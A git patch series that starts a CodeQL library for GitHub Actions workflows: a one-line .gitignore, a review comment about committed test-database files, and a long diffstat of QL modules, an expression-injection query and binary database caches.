From 70a7bb1f7566447d73ff56d3c27b4d6913cf984b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 5 Feb 2024 09:25:33 +0100
Subject: [PATCH 001/707] Add .gitignore
---
 .gitignore | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 .gitignore
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 000000000000..e43b0f988953
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+.DS_Store
From 45d959d13fb981ce2f8dc9e2396a5401321cb8a0 Mon Sep 17 00:00:00 2001
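Review bot: The new `.gitignore` excludes only `.DS_Store`, yet the next patch in this series (002/707, whose diffstat follows) commits generated CodeQL database trees under `ql/lib/test-db/` and `ql/src/test-db/` — cache pages, pools, a `cache/.lock` file, `database-create-*.log` / `database-index-files-*.log` logs and `src.zip`. Those are build outputs that will churn on every database rebuild, and database creation/indexing logs typically record the absolute local paths and environment of the machine that produced them, which is not something a repository should publish. Consider adding `*/test-db/` here so the test databases are produced by the `build-dbs.sh` that the same patch introduces rather than tracked, or, if the databases must be committed for the QL tests, at least exclude their `cache/` directories and log files.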
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 09:26:11 +0100 Subject: [PATCH 002/707] Initial implementation --- build-dbs.sh | 5 + codeql-workspace.yml | 3 + ql/lib/actions.qll | 1 + ql/lib/codeql-pack.lock.yml | 16 + ql/lib/codeql/Locations.qll | 71 +++ ql/lib/codeql/actions/Ast.qll | 256 ++++++++++ ql/lib/codeql/actions/Cfg.qll | 7 + ql/lib/codeql/actions/DataFlow.qll | 10 + ql/lib/codeql/actions/TaintTracking.qll | 10 + .../codeql/actions/ast/internal/Actions.qll | 400 ++++++++++++++++ ql/lib/codeql/actions/ast/internal/Yaml.qll | 50 ++ .../actions/controlflow/BasicBlocks.qll | 445 ++++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 169 +++++++ .../codeql/actions/dataflow/FlowSources.qll | 137 ++++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 31 ++ .../internal/DataFlowImplSpecific.qll | 11 + .../dataflow/internal/DataFlowPrivate.qll | 312 ++++++++++++ .../dataflow/internal/DataFlowPublic.qll | 78 +++ .../internal/TaintTrackingImplSpecific.qll | 11 + .../internal/TaintTrackingPrivate.qll | 30 ++ .../actions/ideContextual/IDEContextual.qll | 19 + .../codeql/actions/ideContextual/printAst.qll | 137 ++++++ ql/lib/codeql/files/FileSystem.qll | 177 +++++++ .../codeql-database.yml | 39 ++ ql/lib/ide-contextual-queries/printAst.ql | 29 ++ ql/lib/ide-contextual-queries/printCfg.ql | 53 +++ ql/lib/qlpack.gbo | 13 + ql/lib/qlpack.yml | 15 + ql/lib/test-db/baseline-info.json | 1 + ql/lib/test-db/codeql-database.yml | 10 + ql/lib/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 
bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 24 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 32 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 24 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 1080 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 544 bytes .../db-yaml/default/cache/pages/01.pack | Bin 0 -> 118 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/0d.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/15.pack | Bin 0 -> 131 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/1f.pack.d | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/34.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/34.pack.d | Bin 0 -> 865 bytes .../db-yaml/default/cache/pages/37.pack | Bin 0 -> 65 bytes 
.../db-yaml/default/cache/pages/37.pack.d | Bin 0 -> 163 bytes .../db-yaml/default/cache/pages/43.pack | Bin 0 -> 368 bytes .../db-yaml/default/cache/pages/54.pack | Bin 0 -> 229 bytes .../db-yaml/default/cache/pages/55.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/55.pack.d | Bin 0 -> 140 bytes .../db-yaml/default/cache/pages/9c.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/9c.pack.d | Bin 0 -> 1086 bytes .../db-yaml/default/cache/pages/a1.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/b4.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b4.pack.d | Bin 0 -> 156 bytes .../db-yaml/default/cache/pages/b7.pack | Bin 0 -> 282 bytes .../db-yaml/default/cache/pages/b9.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/bc.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/bc.pack.d | Bin 0 -> 596 bytes .../db-yaml/default/cache/pages/c0.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/c3.pack | Bin 0 -> 115 bytes .../db-yaml/default/cache/pages/e0.pack | Bin 0 -> 92 bytes .../db-yaml/default/cache/pages/f3.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/02.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 136 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/3b.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/53.pack | 
Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 140 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/7c.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 141 bytes .../db-yaml/default/cache/predicates/a1.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/a2.pack | Bin 0 -> 144 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 148 bytes .../db-yaml/default/cache/predicates/d4.pack | Bin 0 -> 170 bytes .../db-yaml/default/cache/predicates/e3.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/relations/06.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/11.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 289 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/2a.pack | Bin 0 -> 177 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/39.pack | Bin 0 -> 272 bytes .../db-yaml/default/cache/relations/4b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5c.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/7c.pack | Bin 0 -> 143 bytes 
.../db-yaml/default/cache/relations/9f.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/a0.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/bf.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/d3.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/e9.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/f9.pack | Bin 0 -> 143 bytes ql/lib/test-db/db-yaml/default/cache/version | 1 + .../db-yaml/default/containerparent.rel | Bin 0 -> 80 bytes .../default/containerparent.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/files.rel | Bin 0 -> 8 bytes .../db-yaml/default/files.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/default/folders.rel | Bin 0 -> 80 bytes .../db-yaml/default/folders.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/locations_default.rel | Bin 0 -> 1416 bytes .../default/locations_default.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/pools/0/buckets/info | Bin 0 -> 40 bytes .../default/pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/0/info | Bin 0 -> 33 bytes .../db-yaml/default/pools/0/metadata/info | Bin 0 -> 40 bytes .../default/pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../db-yaml/default/pools/1/buckets/info | Bin 0 -> 40 bytes .../default/pools/1/buckets/page-000000 | Bin 0 -> 8192 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 0 -> 40 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 0 -> 8192 bytes .../db-yaml/default/pools/1/indices1/info | Bin 0 -> 40 bytes .../default/pools/1/indices1/page-000000 | Bin 0 -> 8192 bytes ql/lib/test-db/db-yaml/default/pools/1/info | Bin 0 -> 41 bytes .../db-yaml/default/pools/1/metadata/info | Bin 0 -> 40 bytes .../default/pools/1/metadata/page-000000 | Bin 0 
-> 8192 bytes .../default/pools/1/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/pools/poolInfo | Bin 0 -> 32 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 0 -> 4 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 0 -> 12 bytes .../default/strings/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../default/strings/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes ql/lib/test-db/db-yaml/default/yaml.rel | Bin 0 -> 1416 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 0 -> 12 bytes .../db-yaml/default/yaml_locations.rel | Bin 0 -> 472 bytes .../default/yaml_locations.rel.checksum | Bin 0 -> 12 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 0 -> 552 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 0 -> 12 bytes ql/lib/test-db/db-yaml/yaml.dbscheme | 80 ++++ ...-diagnostics-add-20240203T091755.518Z.json | 0 ...-diagnostics-add-20240203T091756.033Z.json | 0 .../database-create-20240203.101754.571.log | 275 +++++++++++ ...tabase-index-files-20240203.101755.239.log | 15 + ql/lib/test-db/src.zip | Bin 0 -> 578 bytes ql/lib/test/test.ql | 59 +++ ql/lib/test/test.yml | 36 ++ ql/lib/yaml.dbscheme | 80 ++++ ql/lib/yaml.dbscheme.stats | 4 + .../Security/CWE-094/ExpressionInjection.ql | 37 ++ ql/src/codeql-pack.lock.yml | 16 + .../codeql-suites/actions-code-scanning.qls | 0 ql/src/qlpack.yml | 14 + ql/src/test-db/baseline-info.json | 1 + ql/src/test-db/codeql-database.yml | 10 + ql/src/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 0 -> 40 bytes .../pools/0/buckets/page-000000 | Bin 0 -> 8192 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 0 -> 40 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 0 -> 8192 bytes .../cached-strings/pools/0/indices1/info | Bin 0 -> 40 bytes .../pools/0/indices1/page-000000 | Bin 0 -> 8192 bytes .../default/cache/cached-strings/pools/0/info | Bin 0 -> 
41 bytes .../cached-strings/pools/0/metadata/info | Bin 0 -> 40 bytes .../pools/0/metadata/page-000000 | Bin 0 -> 8192 bytes .../pools/0/pageDump/page-000000000 | Bin 0 -> 1048592 bytes .../cache/cached-strings/pools/poolInfo | Bin 0 -> 28 bytes .../cache/cached-strings/tuple-pool/header | Bin 0 -> 4 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 0 -> 16 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 0 -> 80 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 0 -> 116 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 0 -> 80 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 0 -> 4776 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 0 -> 16 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 0 -> 12 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 0 -> 16 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 0 -> 12 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 0 -> 16 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 0 -> 12 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 0 -> 24 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-15fd6561 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-15fd6561#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-729b2108 | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-729b2108#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-7595a81e | Bin 0 -> 16 bytes ...king#f6f2598d--TaintFlow-7595a81e#0#tttttt | Bin 0 -> 260 bytes ...Tracking#f6f2598d--TaintFlow-7595a81e#1#tt | Bin 0 -> 68 bytes ...TaintTracking#f6f2598d--TaintFlow-cd159b4d | Bin 0 -> 16 bytes ...ntTracking#f6f2598d--TaintFlow-cd159b4d#0# | Bin 0 -> 12 bytes ...TaintTracking#f6f2598d--TaintFlow-d2947120 | Bin 0 -> 16 bytes ...tTracking#f6f2598d--TaintFlow-d2947120#0#t | Bin 0 -> 2392 bytes ...TaintTracking#f6f2598d--TaintFlow-d8fdd114 | Bin 0 -> 16 bytes 
...ntTracking#f6f2598d--TaintFlow-d8fdd114#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 0 -> 16 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 0 -> 12 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 0 -> 16 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 0 -> 12 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 0 -> 12 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 0 -> 16 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 0 -> 16 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 0 -> 12 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 0 -> 16 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 0 -> 12 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 0 -> 24 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 0 -> 16 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 0 -> 12 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 0 -> 12 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 0 -> 16 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 0 -> 12 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 0 -> 128 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 0 -> 16 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 0 -> 12 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 0 -> 16 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 0 -> 12 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 0 -> 16 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 0 -> 12 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 0 -> 12 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 0 -> 16 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 0 -> 16 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 0 -> 16 bytes 
...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 0 -> 12 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 0 -> 16 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 0 -> 2392 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 0 -> 16 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 0 -> 12 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 0 -> 16 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 0 -> 12 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 0 -> 16 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 0 -> 12 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 0 -> 16 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 0 -> 12 bytes .../tuples#printAst#38acf19d--TPrintNode | Bin 0 -> 16 bytes .../tuples#printAst#38acf19d--TPrintNode#0#e | Bin 0 -> 2672 bytes .../db-yaml/default/cache/pages/02.pack | Bin 0 -> 79 bytes .../db-yaml/default/cache/pages/04.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 0 -> 125 bytes .../db-yaml/default/cache/pages/29.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 0 -> 162 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 0 -> 91 bytes .../db-yaml/default/cache/pages/2e.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/2e.pack.d | Bin 0 -> 316 bytes .../db-yaml/default/cache/pages/32.pack | Bin 0 -> 112 bytes .../db-yaml/default/cache/pages/46.pack | Bin 0 -> 99 bytes .../db-yaml/default/cache/pages/4b.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/4b.pack.d | Bin 0 -> 3805 bytes .../db-yaml/default/cache/pages/67.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/67.pack.d | Bin 0 -> 664 bytes .../db-yaml/default/cache/pages/71.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/71.pack.d | Bin 0 -> 618 bytes .../db-yaml/default/cache/pages/82.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/82.pack.d | Bin 0 -> 354 bytes .../db-yaml/default/cache/pages/91.pack | Bin 0 -> 
112 bytes .../db-yaml/default/cache/pages/92.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/92.pack.d | Bin 0 -> 2612 bytes .../db-yaml/default/cache/pages/95.pack | Bin 0 -> 124 bytes .../db-yaml/default/cache/pages/99.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/99.pack.d | Bin 0 -> 1311 bytes .../db-yaml/default/cache/pages/a3.pack | Bin 0 -> 149 bytes .../db-yaml/default/cache/pages/a3.pack.d | Bin 0 -> 797 bytes .../db-yaml/default/cache/pages/a4.pack | Bin 0 -> 106 bytes .../db-yaml/default/cache/pages/ab.pack | Bin 0 -> 119 bytes .../db-yaml/default/cache/pages/b6.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/b6.pack.d | Bin 0 -> 324 bytes .../db-yaml/default/cache/pages/bd.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/ce.pack | Bin 0 -> 173 bytes .../db-yaml/default/cache/pages/d0.pack | Bin 0 -> 85 bytes .../db-yaml/default/cache/pages/de.pack | Bin 0 -> 65 bytes .../db-yaml/default/cache/pages/de.pack.d | Bin 0 -> 688 bytes .../db-yaml/default/cache/pages/df.pack | Bin 0 -> 86 bytes .../db-yaml/default/cache/pages/e4.pack | Bin 0 -> 89 bytes .../db-yaml/default/cache/pages/e6.pack | Bin 0 -> 117 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 0 -> 84 bytes .../db-yaml/default/cache/predicates/01.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 0 -> 339 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 0 -> 232 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 0 -> 151 bytes .../db-yaml/default/cache/predicates/1f.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/20.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 0 -> 537 bytes .../db-yaml/default/cache/predicates/25.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 0 -> 146 bytes .../db-yaml/default/cache/predicates/28.pack | Bin 0 -> 423 bytes 
.../db-yaml/default/cache/predicates/2a.pack | Bin 0 -> 214 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 0 -> 152 bytes .../db-yaml/default/cache/predicates/32.pack | Bin 0 -> 211 bytes .../db-yaml/default/cache/predicates/36.pack | Bin 0 -> 213 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 0 -> 367 bytes .../db-yaml/default/cache/predicates/43.pack | Bin 0 -> 223 bytes .../db-yaml/default/cache/predicates/45.pack | Bin 0 -> 410 bytes .../db-yaml/default/cache/predicates/57.pack | Bin 0 -> 411 bytes .../db-yaml/default/cache/predicates/59.pack | Bin 0 -> 408 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 0 -> 375 bytes .../db-yaml/default/cache/predicates/5b.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/5d.pack | Bin 0 -> 204 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 0 -> 161 bytes .../db-yaml/default/cache/predicates/66.pack | Bin 0 -> 225 bytes .../db-yaml/default/cache/predicates/6c.pack | Bin 0 -> 206 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/74.pack | Bin 0 -> 418 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 0 -> 345 bytes .../db-yaml/default/cache/predicates/78.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/7b.pack | Bin 0 -> 210 bytes .../db-yaml/default/cache/predicates/7e.pack | Bin 0 -> 220 bytes .../db-yaml/default/cache/predicates/83.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 0 -> 341 bytes .../db-yaml/default/cache/predicates/8d.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/96.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/98.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 0 -> 336 bytes .../db-yaml/default/cache/predicates/9f.pack | Bin 0 -> 211 bytes 
.../db-yaml/default/cache/predicates/a0.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 0 -> 145 bytes .../db-yaml/default/cache/predicates/a9.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/bd.pack | Bin 0 -> 250 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 0 -> 169 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 0 -> 157 bytes .../db-yaml/default/cache/predicates/c9.pack | Bin 0 -> 219 bytes .../db-yaml/default/cache/predicates/ca.pack | Bin 0 -> 254 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 0 -> 363 bytes .../db-yaml/default/cache/predicates/d5.pack | Bin 0 -> 260 bytes .../db-yaml/default/cache/predicates/dc.pack | Bin 0 -> 212 bytes .../db-yaml/default/cache/predicates/de.pack | Bin 0 -> 209 bytes .../db-yaml/default/cache/predicates/df.pack | Bin 0 -> 217 bytes .../db-yaml/default/cache/predicates/e0.pack | Bin 0 -> 207 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 0 -> 147 bytes .../db-yaml/default/cache/predicates/ef.pack | Bin 0 -> 221 bytes .../db-yaml/default/cache/predicates/f8.pack | Bin 0 -> 215 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 0 -> 154 bytes .../db-yaml/default/cache/predicates/ff.pack | Bin 0 -> 253 bytes .../db-yaml/default/cache/relations/07.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0d.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/0e.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/10.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/14.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/18.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/19.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/1b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/28.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 0 -> 177 bytes 
.../db-yaml/default/cache/relations/39.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/47.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/4d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/52.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/56.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/59.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5b.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/5d.pack | Bin 0 -> 160 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/80.pack | Bin 0 -> 126 bytes .../db-yaml/default/cache/relations/85.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/8b.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/aa.pack | Bin 0 -> 143 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 0 -> 109 bytes .../db-yaml/default/cache/relations/c1.pack | Bin 0 -> 143 bytes 